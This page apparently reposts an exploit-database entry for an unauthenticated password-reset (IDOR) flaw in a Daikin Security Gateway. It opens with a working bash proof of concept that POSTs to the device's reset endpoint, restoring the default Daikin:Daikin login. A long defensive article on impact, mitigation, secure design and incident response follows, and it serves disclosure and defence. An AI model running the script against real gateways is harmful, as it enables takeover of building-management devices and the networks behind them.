Daikin Security Gateway 14 - Remote Password Reset

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: Local Language: PHP Published Date: 2025-05-01 
# Daikin Security Gateway 214 - Remote Password Reset
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#

[ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }

TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"

[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }

RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)

[ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; }

if [[ $RESPONSE =~ \"Error\":0 ]]; then
  echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
  echo "Not vulnerable."
else
  echo "Got: $RESPONSE"
fi


Daikin Security Gateway 214 — Remote Password Reset (IDOR) Overview and Mitigation

This article explains a critical authorization flaw discovered in certain Daikin Security Gateway devices that allowed unauthenticated actors to reset device credentials to factory defaults. It covers what the issue is at a conceptual level, the potential impact, secure design patterns to prevent similar issues, and practical mitigation and incident‑response guidance for asset owners and defenders.

Quick summary

  • Affected product: Daikin Security Gateway (models as published by the vendor).
  • Affected versions (as disclosed by the vendor and researcher): application component version 100 and framework component version 214.
  • Vulnerability class: Insecure Direct Object Reference (IDOR) / missing authorization checks in a password‑reset endpoint.
  • Impact: An unauthenticated remote attacker could reset device credentials to defaults and subsequently gain administrative access to the device and connected systems.

Why this is serious

An unauthenticated password reset to default credentials undermines all access controls on the device. Successful exploitation allows lateral movement, persistent access, tampering with device configuration and telemetry, and may expose other systems on the same network. Devices used as gateways or controllers increase the risk to downstream HVAC building management and cloud integrations.

Technical explanation (high level)

The root cause of this vulnerability is a missing or incorrect authorization check on a server API that performs password resets. In secure systems, sensitive operations such as changing account or system credentials must verify the caller’s identity, ownership of the resource acted upon, or possession of a short‑lived reset token issued after a verified challenge (e.g., email, SMS, or a previously authenticated session). When this verification is absent, an attacker can craft requests that reference a target resource (device/account) and trigger a sensitive action without proving they are authorized to do so.

Typical failure modes that lead to IDOR on password reset endpoints

  • Accepting an unauthenticated request to reset credentials for an arbitrary device or account identifier.
  • Relying on obscurity (unguessable identifiers) without explicit authentication or tokenization.
  • Using a single shared default password across devices that is reinstated without enforcing an initial admin password change.
  • Failing to validate the authenticated session or ownership before performing state changes.

Potential impact and use cases

  • Device takeover: attacker obtains admin credentials and reconfigures the gateway.
  • Supply‑chain or cloud compromise: attacker uses the device to impersonate telemetry or control messages to cloud services.
  • Network pivoting: gateway devices often have access to internal networks and other controllers — an attacker may use the gateway to reach additional targets.
  • Availability and safety risks: HVAC and building systems can be disrupted or manipulated, creating operational and safety concerns.

Vendor attribution & advisory

VendorDaikin Industries, Ltd.
ResearcherGjoko 'LiquidWorm' Krstic (@zeroscience)
AdvisoryZSL-2025-5931
Disclosure dateMarch 21, 2025

Remediation and mitigation guidance (for administrators)

Apply the following defensive measures immediately, prioritizing devices exposed to public networks or untrusted segments.

Short‑term mitigations (apply immediately)

  • Isolate affected devices: restrict network access to management interfaces using firewall rules or VLANs. Block inbound access from the public internet to device management ports.
  • Change default credentials: if you can authenticate, replace any factory default accounts with strong, unique passwords and disable unused default accounts.
  • Disable remote management: turn off remote administration or cloud bridging until devices are patched and verified.
  • Monitor and audit: enable and collect logs for authentication, configuration changes, and password resets. Look for unexplained resets or changes to admin accounts.

Medium‑term mitigations

  • Apply vendor patches: install official firmware and application updates as soon as they are released that remediate the vulnerability.
  • Enforce multi‑factor authentication (MFA) for privileged access where supported.
  • Network segmentation: place security gateways and controllers on dedicated management VLANs with strict east‑west access controls.
  • Limit credential exposure: use unique credentials per device and avoid shared accounts across devices.

Long‑term hardening

  • Device inventory and lifecycle: maintain an inventory of installed devices, firmware versions and update status to track vulnerable assets.
  • Vendor engagement: request secure development lifecycle (SDL) evidence and ask the vendor for mitigations that include authorization checks and audit logging.
  • Automated monitoring: integrate device telemetry and configuration events into your SIEM and enable alerting on suspicious resets and admin login events.

Secure design patterns to prevent this class of vulnerability

The following patterns are recommended for developers and integrators building password reset or administrative APIs:

  • Strong authorization checks: always verify the authenticated principal is authorized to act on the specified resource. Resource access controls should be explicit and enforced server‑side.
  • Use one‑time reset tokens: when resetting credentials without a prior session, issue a short‑lived cryptographically random token to the verified owner (via email/SMS or physical console) before allowing a reset.
  • Require proof of ownership: combine tokenization with challenge responses (e.g., confirmation from the device console or an out‑of‑band channel).
  • Reject default‑credential re‑instatements without an authenticated administrator consent or physical presence.
  • Rate limiting, logging and alerting: throttle sensitive endpoints and record detailed audit trails for all privileged operations; alert on anomalous patterns.

Example: safe server-side pattern to prevent IDOR (illustrative pseudocode)

# Pseudocode (Python-like) showing server-side checks for password-reset operations.
# This is illustrative and omits framework-specific details.

def reset_password(request, target_device_id):
    # 1. Authenticate the caller (session, API key, or client certificate)
    user = authenticate_request(request)
    if not user:
        return error_response("authentication_required", 401)

    # 2. Verify authorization: ensure the user has explicit rights over the target device.
    if not is_authorized(user, target_device_id, action="reset_credentials"):
        return error_response("forbidden", 403)

    # 3. Require explicit confirmation or token (e.g., device owner consent)
    reset_token = request.json.get("reset_token")
    if not validate_reset_token(reset_token, target_device_id, user):
        return error_response("invalid_token", 400)

    # 4. Perform the reset, log the operation, and require immediate password change
    perform_reset_to_secure_state(target_device_id)
    log_admin_action(user.id, "reset_credentials", target_device_id, request.source_ip)
    notify_owner_of_reset(target_device_id)
    return success_response("reset_complete")

Explanation: This pseudocode demonstrates four defensive steps: (1) require caller authentication; (2) verify explicit authorization for the requested resource and action; (3) require and validate a one‑time reset token scoped to the device and actor; and (4) log, notify and perform the reset to a secure state. Implementations should use strong cryptographic tokens, short expiry times, and robust logging.

Example: preventing IDOR by checking resource ownership (illustrative SQL-like logic)

-- Example logic to select and verify ownership before changing state. Use parameterized queries.
SELECT owner_id FROM devices WHERE device_id = :device_id;

IF owner_id != current_user_id THEN
  RETURN error('forbidden');
END IF;

-- Proceed with privileged operation
UPDATE devices SET admin_password_hash = :new_hash WHERE device_id = :device_id;

Explanation: Before allowing a sensitive update, retrieve the resource owner and compare it to the authenticated user. If they differ, reject the request. This pattern is a core protection against IDOR vulnerabilities.

Detection and monitoring (for defenders)

Rather than issuing exploit steps, defenders should focus on identification and logging strategies that enable detection of attempted exploitation:

  • Inventory and versioning: maintain a list of devices and their firmware/application versions; prioritize devices matching the affected versions for immediate review.
  • Audit logs: ensure audit logging of admin changes and password resets; enable remote log collection to immutable storage for forensic review.
  • Alerting: configure alerts for password resets, administrative account creation, or sudden changes in device connectivity or cloud registration status.
  • Network telemetry: monitor for new outbound connections from gateway devices or unusual control/management protocol activity.

Incident response checklist

  • Isolate suspected compromised devices from the network.
  • Collect forensic evidence: device logs, timestamps, configuration snapshots, and network captures.
  • Rotate credentials: after verifying device integrity and applying fixes, rotate administrative credentials and associated secrets.
  • Apply vendor patches and confirm the fix is installed.
  • Perform a post‑incident review and update defenses (segmentation, monitoring, change control).

Responsible disclosure and vendor coordination

If you are a vendor, integrator, or customer who finds a similar flaw, follow coordinated disclosure practices: notify the vendor privately with details, provide reproducer information only under an NDA to allow patch development, and coordinate a fix timeline. Vendors should issue patches, publish security advisories, and provide guidance to customers for mitigation and verification.

Final notes

Authorization failures like IDOR on reset and administrative endpoints are high‑impact and relatively common in embedded and IoT ecosystems. Preventing them requires secure default configuration, rigorous server‑side checks, well‑designed tokenized workflows for sensitive operations, and strong operational controls (segmentation, patching, monitoring). Device operators should prioritize patching and network isolation for gateway devices and apply the mitigations above until vendor fixes are fully deployed.